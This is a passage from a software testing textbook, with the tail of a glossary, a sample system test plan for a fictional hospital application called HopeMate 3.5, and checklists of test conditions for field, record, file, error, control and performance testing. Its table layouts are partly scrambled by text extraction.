data (alternate paths or sad path), and finally data intended to force
incorrect processing (e.g., crash the application).
Test Data A defined strategy for the development, use, maintenance, and
Management ultimately destruction of test data.
Test Data Set Set of input elements used in the testing process.
Test Design A document that specifies the details of the test approach for a
Specification software feature or a combination of features and identifies the
associated tests.
Test Driver A program that directs the execution of another program against a
collection of test data sets. Usually, the test driver also records and
organizes the output generated as the tests are run.
Test Incident A document describing any event during the testing process that
Report requires investigation.
Test Item A document that identifies test items and includes status and
Transmittal Report location information.
Test Labs Test labs are another manifestation of the test environment which
is more typically viewed as a brick and mortar environment
(designated, separated, physical location).
Test Point Calculates test effort based on size (derived from FPA), strategy
Analysis (TPA) (as defined by system components and quality characteristics to be
tested and the coverage of testing), and productivity (the amount of
time needed to perform a given volume of testing work).
Test Scripts A specific order of actions that should be performed during a test
session. The script also contains expected results. Test scripts may
be manually prepared using paper forms, or may be automated
using capture/playback tools or other kinds of automated scripting
tools.
Test Stubs Simulates a called routine so that the calling routine’s functions can
be tested. A test harness (or driver) simulates a calling component
or external environment, providing input to the called routine,
initiating the routine, and evaluating or displaying output returned.
Test Suite A tool that allows testers to organize test scripts by function or
Manager other grouping.
Test Summary A document that describes testing activities and results and
Report evaluates the corresponding test items.
Testing Process Thoughtful analysis of testing process results, and then taking
Assessment corrective action on the identified weaknesses.
Thread Testing This test technique, which is often used during early integration
testing, demonstrates key functional capabilities by testing a string
of units that accomplish a specific function in the application.
Timeliness This refers to whether the data was reported in sufficient time to
impact the decisions needed to manage effectively.
Tools Any resources that are not consumed in converting the input into
the deliverable.
Top-Down Begin testing from the top of the module hierarchy and work down
to the bottom using interim stubs to simulate lower interfacing
modules or programs. Modules are added in descending
hierarchical order.
Tracing A process that follows the flow of computer logic at execution time.
Tracing demonstrates the sequence of instructions or a path
followed in accomplishing a given task. The two main types of trace
are tracing instructions in computer programs as they are
executed, or tracing the path through a database to locate
predetermined pieces of information.
Use Case Points A derivative of the Use Cases method is the estimation technique
(UCP) known as Use Case Points. Use Case Points are similar to
Function Points and are used to estimate the size of a project.
Usability Test The purpose of this event is to review the application user interface
and other human factors of the application with the people who will
be using the application. This is to ensure that the design (layout
and sequence, etc.) enables the business functions to be executed
as easily and intuitively as possible. This review includes assuring
that the user interface adheres to documented User Interface
standards, and should be conducted early in the design stage of
development. Ideally, an application prototype is used to walk the
client group through various business scenarios, although paper
copies of screens, windows, menus, and reports can be used.
User Acceptance User Acceptance Testing (UAT) is conducted to ensure that the
Testing system meets the needs of the organization and the end user/
customer. It validates that the system will work as intended by the
user in the real world, and is based on real world business
scenarios, not system requirements. Essentially, this test validates
that the right system was built.
User Story A short description of something that a customer will do when they
use an application (software system). The User Story is focused on
the value or result a customer would receive from doing whatever it
is the application does.
Values (Sociology) The ideals, customs, instructions, etc., of a society toward which
the people have an affective regard. These values may be positive,
as cleanliness, freedom, or education, or negative, as cruelty,
crime, or blasphemy. Any object or quality desired as a means or
as an end in itself.
White-Box Testing A testing technique that assumes that the path of the logic in a
program unit or component is known. White-box testing usually
consists of testing paths, branch by branch, to produce predictable
results. This technique is usually used during tests executed by the
development team, such as Unit or Component testing,
Wideband Delphi A method for the controlled exchange of information within a group.
It provides a formal, structured procedure for the exchange of
opinion, which means that it can be used for estimating.
B
Test Plan Example
I
HOPE MATE VERSION 3.5
SYSTEM TEST PLAN
CHICAGO HOPE
DEPARTMENTOF
INFORMATION
TECHNOLOGY (DOIT)
Document Control
Control
Document ID: HopeMate_V35_TEST_PLAN Version: .2
Document
HopeMate Version 3.5 System Test Plan.
Name:
Originator: M.Jones Status: DRAFT
Creation/Approval Information
Activity Name Signature Date
M. Jones
Created By:
Reviewed By:
Approved By:
Abstract
Distribution
Test Manager Test Team Leader
Quality Manager Test Team Members
QA Group Project Manager 1
Projects Office Project Manager 2
History
Version Modified By Date Description
0.1 M. Jones 04/11/xx Draft
0.2 M. Jones 04/13/xx Minor Corrections
Post Review by
0.3 M. Jones 04/22/xx
Test Manager
Post Review by
0.4 M. Jones 05/04/xx
Projects Office
Table of Contents
3. TEST STRATEGY....................................................................................................13
3.1. OVERALL STRATEGY.........................................................................................13
3.2. PROPOSED SOFTWARE “DROPS” SCHEDULE...............................................13
3.3. TESTING PROCESS ..............................................................................................14
3.4 INSPECTING RESULTS ........................................................................................14
3.5. SYSTEM TESTING................................................................................................15
3.5.1 Test Environment Pre-Test Criteria...................................................................15
3.5.2 Resumption Criteria ...........................................................................................15
3.6. EXIT CRITERIA.....................................................................................................15
3.7. DAILY TESTING STRATEGY .............................................................................15
3.8 TEST CASES OVERVIEW.....................................................................................16
3.9. SYSTEM TESTING CYCLES ...............................................................................16
7. SIGNOFF.....................................................................................................................24
1. General Information
1.1. Definitions:
Testing Software is operating the software under controlled conditions, to (1) ver-
ify that it behaves “as specified”; (2) to detect errors, and (3) to check that what has
been specified is what the user actually wanted.
Unit testing – the most ‘micro’ scale of testing; to test particular functions or code
modules. Typically done by the programmer and not by testers, as it requires
detailed knowledge of the internal program design and code. (see ‘White Box’
testing)
Load testing – testing an application under heavy loads, such as testing of a web
System under a range of loads to determine at what point the system’s response
time degrades or fails.
Stress testing – term often used interchangeably with ‘load’ and ‘performance’
testing. Also used to describe such tests as system functional testing while under
unusually heavy loads, heavy repetition of certain actions or inputs, input of large
numerical values, large complex queries to a database system, etc.
Performance testing – term often used interchangeably with ‘stress’ and ‘load’
testing. Ideally ‘performance’ testing (and any other ‘type’ of testing) is defined in
requirements documentation or QA or Test Plans.
Security testing – testing how well the system protects against unauthorized inter-
nal or external access, wilful damage, etc; may require sophisticated testing tech-
niques.
Black box testing is testing the application without any specific knowledge of
internal design or code. Tests are based on requirements and functionality,
whereby a specific input produces an output (result), and the output is checked
against a pre-specified expected result.
Soak Testing is testing the stability and ‘uptime’ of the integrated software appli-
cation.
1.2 References
1.2.1 Document Map:
This section contains the document Map of the HopeMate 3.5 Project System Test documen-
tation.
Originator /
Reference Location / Link
Owner
Originator /
Reference Location / Link
Owner
List key contributors to this document. These may include clients, developers, QA, configura-
tion managers, test analysts.
Role Name
Time Commit-
Name Dept. Phone Skills ment Utilized How
A dedicated, separate test environment is required for System Testing. This environment will
consist of the hardware and software components.
The environment that will be used is the MAIN test environment - http://11.22.33.44/
Software Version
Windows x 2nd Release & JVM Update
Windows XX Server Service Pack x
Internet Explorer x.03
Chrome x.01
Safari x.7
FireFox x.61
Outlook 20xx 20xx
Microsoft Office 20xx 20xx Professional
Ghost -
System Commander Deluxe
1.7 Schedule
The purpose of the document is to describe the approach to be used by Chicago Hope DOIT
for testing the HopeMate 3.5 upgrade, the exact scope of which will be specified in section
2.3.
This document is a draft description, and as such is required to be reviewed before being
accepted.
The Test Specification is a separate document which follows on from this System Test Plan.
The Test Specification document contains detailed test cases and automated test scripts to be
applied, the data to be processed, the automated testing coverage & scripts, and the expected
results.
The objectives will be achieved by defining, reviewing and executing detailed test cases, in
which specified steps will be taken to test the software, the results of which will be compared
against pre-specified expected results, to evaluate whether the test was successful. This can
only happen in working directly with the business groups to define their requirements from
the system.
2.3.1 Inclusions
The scope of the Chicago Hope DOIT testing consists of System Testing, as defined in Sec-
tion 1: Definitions, of the HopeMate Project components only.
The contents of this release, which this test plan will cover, are as follows:
Detailed descriptions of the scope of each function will be described in section 2.4.
2.3.2. Exclusions
When the scope of the Test Plan has been agreed and signed off, no further inclusions will be
considered for inclusion in this release, except:
1) Where there is the express permission and agreement of the Chicago Hope DOIT Sys-
tem Test Manager and the Test Team Leader; and
2) Where the changes/inclusions will not require significant effort on behalf of the test
team (i.e. requiring extra preparation - new test cases etc.) and will not adversely affect
the test schedule; or
3) The Chicago Hope DOIT System Test Manager explicitly agrees to accept any impact
on the test schedule resulting from the changes/inclusions.
4) System testing means black-box testing - this means that testing will not include PL/
SQL validation.
• Severity A Errors since the code cut was taken (4th April) until the start of system test
(8th May).
• Usability Testing (UT), is the responsibility of Chicago Hope xx Department.
• There will be no testing other than specified in the Test Specification document.
• No Hardware testing will be performed.
• Testing of the application on Linux is outside the scope of this plan.
• Testing of the application on Unix, including Solaris is outside the scope of this plan.
• Testing of the application on Windows XP Pro is outside the scope of this plan
• Security Testing is outside the scope of this plan.
• Any other test configuration other than those specified in the test configurations docu-
ment will not be tested.
• System Testing
• Management of User Acceptance Testing
• Error Reporting and tracking
• Progress Reporting
• Post Test Analysis
The Access Management upgrade system testing comprises system testing of the four main
application sections:
• Basic Registration
• Enterprise Registration
• Interface and Conversion Tools
• Location Management
1) Defect fixes applied by J.S. Smith as specified in J.S. Smith’s document "Access Man-
agement Final Status".
2) Enhancements as specified in XYZsys’ “HopeMate 3.5 Feature List”.
2.4.2. Ambulatory
Notes:
• Chicago Hope DOIT will initially test using sample files provided by XYZsys, and
then liaise with XYZsys and Chicago Hope xx Department for further testing.
• Chicago Hope DOIT will check file formats against the Technical Specification v1.03.
Note - Stress Testing & Performance criteria have not been specified for the Emergency
Department, thus performance/stress testing cannot, and will not, be performed by Chicago
Hope DOIT as part of the HopeMate 3.5 System Test.
2.4.5. Infrastructure
The HopeMate 3.5 Infrastructure system testing comprises system testing of the security/
application access. See section 2.4.6 for details:
2.4.6. Portal/Mobility/SHM
The HopeMate 3.5 Security system testing comprises testing of the two main internal applica-
tions:
· Secure Health Messages (SHM)
· Security Application Access (Biometric Authentication)
1. Defect fixes applied by J.S. Smith as specified in J.S. Smith’s document "Security
Final Status".
2. Performance Enhancements as specified in J.S. Smith’s documents "Biometric
Enhancements Notes" and " Final Status" documents.
3. Test Strategy
The testing approach is largely determined by the nature of the delivery of the various soft-
ware components that comprise the HopeMate 3.5 upgrade. This approach consists of incre-
mental releases, “drops”, in which the later release contains additional functionality.
In order for the software to be verified by the Xth of month Y, the software is required to be of
a good quality – and must be delivered on time, and must include the scheduled deliverables.
Additionally, in order for adequate regression testing to take place, all the functions must be
fully fixed prior to next software “drop”.
To verify that each ‘drop’ contains the required deliverables, a series of pre-tests (per build
tests) shall be performed upon each release. The aim of this is twofold – firstly to verify that
the software is of “testable” quality, and secondly to verify that the application has not been
adversely affected by the implementation of the additional functionality. [See Section 3.5 for
details of the pre-tests.]
The main thrust of the approach is to intensively test the front end in the first releases, discov-
ering the majority of errors in this period. With the majority of these errors fixed, end-to-end
testing will be performed to prove total system processing in the later Releases.
System retest of outstanding errors and related regression testing will be performed on an
ongoing basis.
When all serious errors are fixed, an additional set of test cases will be performed in the final
release to ensure the system works in an integrated manner. It is intended that the testing in the
later releases be the final proving of the system as a single application, and not testing of indi-
vidual functions. There should be no class A or B errors outstanding prior to the start of final
Release testing.
The testing will be performed in a stand alone test environment that will be as close as possi-
ble to the customer environment (live system). This means that the system will be running in
as complete a manner as possible during all system testing activities.
Chicago Hope DOIT plans to begin testing the HopeMate 3.5 application on Monday the 10th
of month Y, 200x, and is scheduled to last until the 3rd of month Z, 200x.
All system test cases and automated test scripts will be developed from the functional specifi-
cation, requirements definition, real world cases, and transaction type categories.
Most testing will take a black box approach, in that each test case will contain specified
inputs, which will produce specified expected outputs.
Although the initial testing will be focused on individual objects (e.g. Emergency Depart-
ment), the main bulk of the testing will be end-to-end testing, where the system will be tested
in full.
A series of simple tests will be performed for the test environment pre-test. In order for the
software to be accepted into test these test cases should be completed successfully. Note -
these tests are not intended to perform in depth testing of the software.
In the event that system testing is suspended resumption criteria will be specified and testing
will not re-commence until the software reaches these criteria.
The Exit Criteria detailed below must be achieved before the Phase 1 software can be recom-
mended for promotion to User Acceptance status. Furthermore, it is recommend that there be
a minimum 2 days effort Final Regression testing AFTER the final fix/change has been
retested.
• All High Priority errors from System Test must be fixed and tested
• If any medium or low-priority errors are outstanding - the implementation risk must be
signed off as acceptable by Design Team.
"Day 1"
Input data through the front end applications
Files will be verified to ensure they have correct test data
Run Day 1 cgi-bin & perl scripts
Check Outputs
Check Log files
"Day 2"
Validation & Check off via front-end applications
Files will be verified to ensure they have correct test data
Run Day 2 cgi-bin & perl scripts
Check Outputs
Check Log files
"Day 3"
Validation & Check off via front-end applications
Files will be verified to ensure they have correct test data
Unvalidated & Insecure Items Processing
Run cgi-bin & perl scripts Day 1 & 2
Check Outputs
Check Log files
The software will be tested, and the test cases will be designed, under the following functional
areas:
SECTION CATEGORY
1. Build Tests
2. System pre-tests
3. System installation tests
4. GUI Validation tests
5. System Functionality tests
6. Error Regression tests
7. Full Regression Cycle
Testing Cycle
1. Build Tests
2. Installation Tests
3. System Pre-Tests
4. Testing of new functionality
5. Retest of fixed Defects
6. Regression testing of unchanged functionality
4. Management Procedures
All errors and suspected errors found during testing will be input by each tester to the Chicago
Hope DOIT MS Access Error tracking system.
The Defects will be recorded against specific builds and products, and will include a one line
summary description, a detailed description and a hyperlink to a screenshot (if appropriate).
The error tracking system will be managed (logged, updated and reported) by Chicago Hope
DOIT.
Any critical problems likely to affect the end date for testing will be reported immediately to
the Test Manager and hence the Quality Manager.
Daily metrics will be generated, detailing the testing progress that day. The report will include
Defect classification, status and summary description.
During System Test, discrepancies will be recorded as they are detected by the testers. These
discrepancies will be input into the Chicago Hope DOIT Defect Database with the status
“Open”.
Daily an “Error Review Team” will meet to review and prioritise the errors that were raised,
and either assign, defer, or close them as appropriate. Error assignment shall be via email.
This team will consist of the following representatives:
Overview of test status flow: (Note - Engineering status flow not reflected - Assigned & Work
in Progress errors are with the development team, and the engineering status is kept separate.
The DOIT Test Team will then revisit the Defect when it exits the engineering status and "re-
Open => Assigned => Work in Progress => Fixed to be Confirmed => CLOSED + reason for
closing
The Error status changes as follows: initially Open, Error Review Team sets Assigned, Tech
Team leads sets the value for "Assigned To" (i.e. the developer who will fix it) and when
Defect is being fixed the developer sets it to Work in Progress, then sets it to "Fixed to be
Confirmed" when fix is ready. Note - Only the testers can set the error status to closed. These
changes can only be made in the Error Management system according to your access rights.
Closed has a set of reason values - e.g. Fixed & Retested; Not an Error; Duplicate; Change
Request; 3rd Party error.
Errors, which are agreed as valid, will be categorised as follows by the Error Review Team :
• Category A - Serious errors that prevent System test of a particular function continu-
ing or serious data type error
• Category B - Serious or missing data related errors that will not prevent implementa-
tion.
• Category C - Minor errors that do not prevent or hinder functionality.
The Test Lead will refer any major error/anomaly to either Development Team
Leader or designated representative on the development team as well as raising
a formal error record.
J.S. Smith will also be immediately informed of any Defects that delay testing.
All Defects raised will be entered into the Defect Database, which will contain
2.
all relevant data.
3. These errors will be logged on the day they occur with a status of "OPEN"
A daily "Error Review Team" will meet to review and prioritise the discrepan-
cies that were raised, and will assign the Defects to the appropriate parties for
4.
fixing. The assignments will be made automatically via email by the Error Man-
agement System.
The database should be updated by the relevant person (i.e. developer, tester
5. etc.) with the status of all errors should the status of the error change - e.g.
Assigned, Work in Progress, Fixed to be confirmed, Closed.
Errors will remain in an "Open" state until they are "Assigned" to the responsi-
ble parties; they will remain "Assigned" until the status of the error changes to
6.
"Work In Progress", then set to "Fixed to be Confirmed" when a fix is ready or
"Open" if not fixed.
Once a number of errors have been fixed and the software is ready for another
7. release into the test environment, the contents of the new release (e.g. the num-
bers of the Defect fixes included) will be passed to the Test Manager.
Once the error has been re-tested and proven to be fixed the status will be
changed to 'Closed' (if it is fixed) or "Not Fixed" (if is not fixed).
8.
The regression test details will also be filled in, specifying the date re-tested etc.
The purpose of the Error Review meeting is to ensure the maximum efficiency of the develop-
ment and system testing teams for the release of the new software through close co-operation
of all involved parties.
Note: Release content and timescale must be co-ordinated with the Development Manager
and System Test Manager, and must satisfy the agreed Build Handover procedures. This also
applies to any production fixes implemented - the handover has to specify the content of the
release, including any such fixes.
Progress reports will be distributed to the Project Meeting, Development Manager and Quality
Manager. The progress report will detail:
• Test Plans
• Test Progress to date
• Test execution summary
• List of problems opened
• Plans of next test activities to be performed
• Any testing issues/risks which have been identified
For each set of test cases executed, the following results shall be maintained...
• Test Identifier, and Error identifier if the test failed
• Result - Passed, Failed, Not Executable, For Retest
• Test Log
• Date of execution
• Signature of tester
Once a new build or software is delivered into Test, errors which have been resolved by the
Development Engineers, will be validated. Any discrepancies will be entered/re-entered into
the error tracking system and reported back to the Development Team.
Builds will be handed off to System Test, as described in point 4.3.4.
This procedure will be repeated until the exit criteria are satisfied.
The test procedures and guidelines to be followed for this project will be detailed as follows:
• A specific test directory has been setup, which will contain the test plan, all test
cases, the error tracking database and any other relevant documentation.
The location of this directory is: \\Server\Folder\QA\SystemTesting
The following table lists the test documents which will be produced as part of the System
testing of the software, along with a brief description of the contents of each document.
DOCUMENTATION DESCRIPTION
(this document) Describes the overall test approach for the proj-
Test Plan ect, phases, objectives etc. to be taken for testing the software,
and Control documentation.
Describes the test environment - hardware & Software; the test
Test Specification machine configurations to be used and provides a detailed speci-
fication of the tests to be carried out.
Test Logs Results of test cases.
Contains the Defect database used for tracking the Defects
DOIT Defect Database
reported during system test.
Test Report Post testing review & analysis.
Daily, Weekly & Summary totals of Errors raised during System
Metrics
Test
Table 5-1: System Test Documentation Suite
There will be several formal review points before and during system test, including the review
of this document. This is a vital element in achieving a quality product.
The testing could be severely impacted, resulting in incomplete or inadequate testing of the
software, or adversely affecting the release date, by the following risks and dependencies:
6.1. Risks
DETAIL RESPONSIBLE
Out of date/inaccurate requirements definition/functional
specification(s)
Lack of unit testing
Problems relating to Code merge
Test Coverage limitations (OS/Browser matrix)
6.2. Dependencies
All functionality has to be fully tested prior to the Xth of month Y. That means that the close
of business on the Xth of month Y is the latest time in which a test build can be accepted for
final regression testing if the testing is to be complete on the Zrd of month Z.
This means that all Defects must have been detected and fixed by close of business on the Xth
of month Y, leaving 3 days to do the final regression test.
7. Signoff
This document must be formally approved before System Test can commence. The following
people will be required to sign off (see Document Control at beginning of Test Plan):
GROUP
Chicago Hope DOIT Quality Manager
Project Manager1
Business Owner
C
Test Transaction Types
Checklists
T he checklists found in appendix C are referenced as part of Skill Category 7, section 7.1.3,
Defining Test Conditions from Test Transaction Types.
RESPONSE
# Item
Yes No N/A Comments
1. Have all codes been validated?
2. Can fields be properly updated?
3. Is there adequate size in the field for
accumulation of totals?
4. Can the field by properly initialized?
5. If there are restrictions on the contents
of the field, are those restrictions
validated?
6. Are rules established for identifying and
processing invalid field data?
a. If no, develop this data for the
error-handling transaction type.
b. If yes, have test conditions
been prepared to validate the
specification processing for
invalid field data?
7. Have a wide range of normal valid
processing values been included in the
test conditions?
8. For numerical fields, have the upper
and lower values been tested?
9. For numerical fields, has a zero value
been tested?
10. For numerical fields, has a negative test
condition been prepared?
11. For alphabetical fields, has a blank
condition been prepared?
12. For an alphabetical/alphanumeric field,
has a test condition longer than the field
length been prepared? (The purpose is
to check truncation processing.)
13. Have you verified from the data
dictionary printout that all valid
conditions have been tested?
14. Have you reviewed systems
specifications to determine that all valid
conditions have been tested?
RESPONSE
# Item
Yes No N/A Comments
15. Have you reviewed requirements to
determine all valid conditions have been
tested?
16. Have you verified with the owner of the
data element that all valid conditions
have been tested?
RESPONSE
# Item
Yes No N/A Comments
1. Has a condition been prepared to test
the processing of the first record?
2. Has a condition been determined to
validate the processing of the last
record?
3. If there are multiple records per
transaction, are they all processed
correctly?
4. If there are multiple records on a
storage media (i.e., permanent or
temporary file), are they all processed
correctly?
5. If there are variations in size of record,
are all those size variations tested (e.g.,
a header with variable length trailers)?
6. Can two records with the same identifier
be processed (e.g., two payments for
the same accounts receivables file)?
7. Can the first record stored by retrieved?
8. Can the last record stored be retrieved?
9. Will all the records entered be properly
stored?
10. Can all of the records stored be
retrieved?
11. Do current record formats coincide with
the formats used on files created by
other systems?
RESPONSE
# Item
Yes No N/A Comments
1. Has a condition been prepared to test
each file?
2. Has a condition been prepared to test
each file’s interface with each module?
3. Have test conditions been prepared to
validate access to each file in different
environments (e.g., web, mobile,
batch)?
4. Has a condition been prepared to
validate that the correct version of each
file will be used?
5. Have conditions been preperaed that
will validate that each file will be
properly closed after the last record has
been processed for that file?
6. Have conditions been prepared that will
validate that each record type can be
processed from beginning to end of the
system intact?
7. Have conditions been prepared to
validate that all of the records entered
will be processed through the system?
8. Are test conditions prepared to create a
file for which no prior records exist?
9. Has a condition been prepared to
validate the correct closing of a file
when all records on the file have been
deleted?
RESPONSE
# Item
Yes No N/A Comments
1. Has a data element relationship test
matrix been prepared?
2. Has the relationship matrix been
verified for accuracy and completeness
with the end user/customer/BA of the
system?
3. Has the relationship matrix been
verified for accuracy and completeness
with the project leader of the system?
4. Does the test relationship matrix include
the following relationships:
a. Value of one field related to the
value in another field
b. Range of values in one field
related to a value in another
field
c. Including a value in one field
requires the inclusion of a value
in another field
d. The absence of a value in one
field causes the absence of a
value in another field
e. The presence of a value in one
field causes the absence of
certain values in another field
(for example, the existence of a
particular customer type might
exclude the existence of a
specific product in another field,
such as a retail customer may
not buy a commercial product)
f. The value in one field is
inconsistent with past values for
that field (for example, a
customer who normally buys a
in a quantity of two or three now
has a purchase quantity of 600)
RESPONSE
# Item
Yes No N/A Comments
4. g. The value in one field is
inconsistent with what would
logically be expected for an
area/activity (for example, it
may be inconsistent for people
in a particular department to
work and be paid for overtime)
h. The value in one field is
unrealistic for that field (for
example, for hours worked
overtime, 83 might be an
unrealistic value for that field
this is a relationship between
field and the value in the field)
i. Relationships between time
periods and conditions (for
example, bonuses might only
be paid during the last week of
a quarter)
j. Relationships between time of
day and processing occurring
(for example, a teller
transaction occurring other than
normal banking hours)
5. Have conditions been prepared for all
relationships that have a significant
impact on the application?
RESPONSE
# Item
Yes No N/A Comments
1. Has a brainstorming session with end
users/customers been performed to
identify functional errors?
2. Has a brainstorming session been
conducted with project personnel to
identify structural error conditions?
3. Have functional error conditions been
identified for the following cases:
a. Rejection of invalid codes
b. Rejection of out-of-range
values
c. Rejection of improper data
relationships
d. Rejections of invalid dates
e. Rejections of unauthorized
transactions of the following
types:
•. Not a valid value
•. Not a valid customer
•. Not a valid product
•. Not a valid transaction type
•. Not a valid price
f. Alphabetic data in numeric
fields
g. Blanks in a numeric field
h. All blank conditions in a
numerical field
i. Negative values in a positive
field
j. Positive values in a negative
field
k. Negative balances in a financial
account
l. Numbers in an alphabetic field
m. Blanks in an alphabetic field
n. Values longer than the field
permits
o. Totals which exceed maximum
size of total fields
RESPONSE
# Item
Yes No N/A Comments
3. p. Proper accumulation of totals
(at all levels for multiple level
totals)
q. Incomplete transactions (i.e.,
one or more fields missing)
r. Obsolete data in the field (e.g.,
a code which had been valid
but is no longer valid)
s. New value which will become
acceptable but is not
acceptable at the current time
(e.g., a new district code for
which the district has not yet
been established)
t. A postdated transaction
u. Change of a value which affects
a relationship (e.g., if the unit
digit was used to control year,
then the switching from nine in
89 to zero in 90 can be
adequately processed)
4. Has the data dictionary list of field
specifications been used to generate
invalid specifications?
5. Have the following architectural error
conditions been tested:
a. Page overflow
b. Report format conformance to
design layout
c. Posting of data in correct
portion of reports
d. Printed error messages are
representative of actual error
condition
e. All instructions are executed
f. All paths are executed
g. All internal tables are tested
h. All loops are tested
i. All “perform” type of routines
have been adequately tested
j. All compiler warning messages
have been adequately
addressed
k. The correct version of the
program has been tested
l. Unchanged portions of the
system will be revalidated after
any part of the system has
been changed
RESPONSE
# Item
Yes No N/A Comments
1. Have all of the end user actions been
identified?
2. Have the actions been identified in
enough detail that the contributions of
information system outputs can be
related to those actions?
3. Has all of the information utilized in
taking an action been identified and
related to the action?
4. Have the outputs from the application
under test been identified to the specific
actions?
5. Does the end user correctly understand
the output reports/screens?
6. Does the end user understand the type
of logic/computation performed in
producing those outputs?
7. Is the end user able to identify the
contribution those outputs make to the
actions taken?
8. Has the relationship between the
system outputs and business actions
been defined?
9. Does the interpretation of the matrix
indicate that the end user does not have
adequate information to take an action?
RESPONSE
# Item
Yes No N/A Comments
1. Have all the internal tables been
identified?
2. Have all the internal lists of error
messages been identified?
3. Has the search logic been identified?
4. Have all the authorization routines been
identified?
5. Have all the password routines been
identified?
6. Has all the business processing logic
that requires a search been identified?
7. Have the data base search routines
been identified?
8. Have subsystem searches been
identified (for example, finding a tax rate
in a sales tax subsystem)?
9. Has a complex search logic been
identified (i.e., that requiring two or
more conditions or two or more records
such as searching for accounts over 90
days old and over $100)?
10. Have test conditions been graded for all
of the above search conditions?
11. Has the end user been interviewed to
determine the type of one-time
searches that might be encountered in
the future?
RESPONSE
# Item
Yes No N/A Comments
1. Have all the files associated with the
application been identified? (Note that
in this condition files include specialized
files, data bases, and internal groupings
of records used for matching and
merging).
2. Have the following merge/match
conditions been addressed:
a. Merge/match of records of two
different identifiers (inserting a
new item, such as a new
employee on the payroll file)
b. A merge/match on which there
are no records on the merged/
matched file
c. A merge/match in which the
merged/matched record
becomes the lowest value on
the file
d. A merge/match in which the
merged/matched record
becomes the highest value on
the file
e. A merge/match in which the
merged/matched record has an
equal value as an item on a file,
for example, adding a new
employee in which the new
employee’s payroll number
equals an existing payroll
number on the file
f. A merge/match for which there
is no input file/transactions
being merged/matched
g. A merge/match in which the
first item on the file is deleted
h. A merge/match is which the last
item on the merged/matched
file is deleted
i. A merge/match in which two
incoming records have the
same value
RESPONSE
# Item
Yes No N/A Comments
2. j. A merge/match in which two
incoming records indicated a
value on the merged/matched
file is to be deleted
k. A merge/match condition when
the last remaining record on the
merged/matched file is deleted
l. A merge/match condition in
which the incoming merged/
matched file is out of the
sequence, or has a single
record out of sequence
3. Have these test conditions been applied
to the totality of merge/match conditions
that can occur in the application under
test?
RESPONSE
# Item
Yes No N/A Comments
1. Have all the desired performance
capabilities been identified?
2. Have all the system features that
contribute to test been identified?
3. Have the following system performance
capabilities been identified:
a. Turnaround performance
b. Availability/up-time
performance
c. Response time performance
d. Error handling performance
e. Report generation performance
f. Internal computational
performance
4. Have the following system features
been identified which may adversely
affect performance:
a. Internal computer processing
speed
b. Efficiency of programming
language
c. Efficiency of data base
management system
d. File storage capabilities
5. Do the project personnel agree that the
stress conditions are realistic to validate
software performance?
RESPONSE
# Item
Yes No N/A Comments
1. Have the business transactions
processed by the software been
identified?
2. Has a transaction flow analysis been
made for each transaction
3. Have the controls over the transaction
flow been documented?
4. Do the data input controls address the
following areas:
a. Do they ensure the accuracy of
data input?
b. Do they ensure the
completeness of data input?
c. Do they ensure the timeliness
of data input?
d. Are record counts used where
applicable?
e. Are predetermined control
totals used where applicable?
f. Are control logs used where
applicable?
g. Is key verification used where
applicable?
h. Are the input data elements
validated?
i. Are controls in place to monitor
overrides and bypasses?
j. Are overrides and bypasses
restricted to supervisory
personnel?
k. Are overrides and bypasses
automatically recorded and
submitted to supervision for
analysis?
l. Are transaction errors
recorded?
m. Are rejected transactions
monitored to assure that they
are corrected on a timely basis?
n. Are passwords required to
enter business transactions?
RESPONSE
# Item
Yes No N/A Comments
4. o. Are applications shut down
(locked) after predefined
periods of inactivity?
5. Do the data entry controls include the
following controls:
a. Is originated data accurate?
b. Is originated data complete?
c. Is originated data recorded on a
timely basis?
d. Are there procedures and
methods for data origination?
e. Are cross-referenced fields
checked?
f. Are pre-numbered documents
used where applicable?
g. Is there an effective method for
authorizing transactions?
h. Are systems overrides
controlled? Are they
applicable?
i. Are manual adjustments
controlled?
6. Do the processing controls address the
following areas:
a. Are controls over input
maintained throughout
processing?
b. Is all entered data validated?
c. Do overriding/bypass
procedures need to be
manually validated after
processing?
d. Is a transaction history file
maintained?
e. Do procedures exist to control
errors?
f. Are rejected transactions
controlled to assure correct and
reentry?
g. Have procedures been
established to control the
integrity of data files/data
bases?
h. Do controls exist over recording
the correct dates for
transactions?
i. Are there concurrent update
protections procedures?
RESPONSE
# Item
Yes No N/A Comments
6. j. Are easy-to-understand error
messages printed out for each
error condition?
k. Are the procedures for
processing corrected
transactions the same as those
for processing original
transactions?
7. Do the data output controls address the
following items?
a. Are controls in place to assure
the completeness of output?
b. Are output documents reviewed
to ensure that they are
generally acceptable and
complete?
c. Are output documents
reconciled to record counts/
control totals?
d. Are controls in place to ensure
that output products receive the
appropriate security protection?
e. Are output error messages
clearly identified?
f. Is a history maintained of output
product errors?
g. Are users informed of abnormal
terminations?
8. Has the level of risk for each control
area been identified?
9. Has the level of risk been confirmed
with the audit function?
10. Has the end user/customer been
notified of the level of control risk?
RESPONSE
# Item
Yes No N/A Comments
1. Have the software attributes been
identified?
2. Have the software attributes been
ranked?
3. Does the end user/customer agree with
the attribute ranking?
4. Have test conditions been developed
for at least the high importance
attributes?
5. For the correctness attributes, are the
functions validated as accurate and
complete?
6. For the authorization attribute, have the
authorization procedures for each
transaction been validated?
7. For the file integrity attribute, has the
integrity of each file/table been
validated?
8. For the audit trail attribute, have test
conditions validated that each business
transaction can be reconstructed?
9. For the continuity of processing
attribute, has it been validated that the
system can be recovered within a
reasonable time span and that
transactions can be captured and/or
processed during the recovery period?
10. For the service attribute, has it been
validated that turnaround time/response
time meets user needs?
11. For the access control attribute, has it
been validated that only authorized
individuals can gain access to the
system?
RESPONSE
# Item
Yes No N/A Comments
12. For the compliance attribute, has it
been validated that IT standards are
complied with, that the system
development methodology is being
followed, and that the appropriate
policies, procedures, and regulations
are complied with?
13. For the reliability attribute, has it been
validated that incorrect, incomplete, or
obsolete data will be processed
properly?
14. For the ease of use attribute, has it
been validated that people can use the
system effectively, efficiently, and
economically?
15. For the maintainable attribute, has it
been validated that the system can be
changed, enhanced with reasonable
effort and on a timely basis?
16. For the portable attribute, has it been
validated that the software can be
moved efficiently to other platforms?
17. For the coupling attribute, has it been
validated that this software system can
properly integrate with other systems?
18. For the performance attribute, has it
been validated that the processing
performance/software performance is
acceptable to the end user?
19. For the ease of use attribute, has it
been validated that the operation
personnel can effectively, economically,
and efficiently operate the software?
RESPONSE
# Item
Yes No N/A Comments
1. Has the state of an empty master file
been validated?
2. Has the state of an empty transaction
file been validated?
3. Has the state of an empty table been
validated?
4. Has the state of an insufficient quantity
been validated?
5. Has the state of negative balance been
validated?
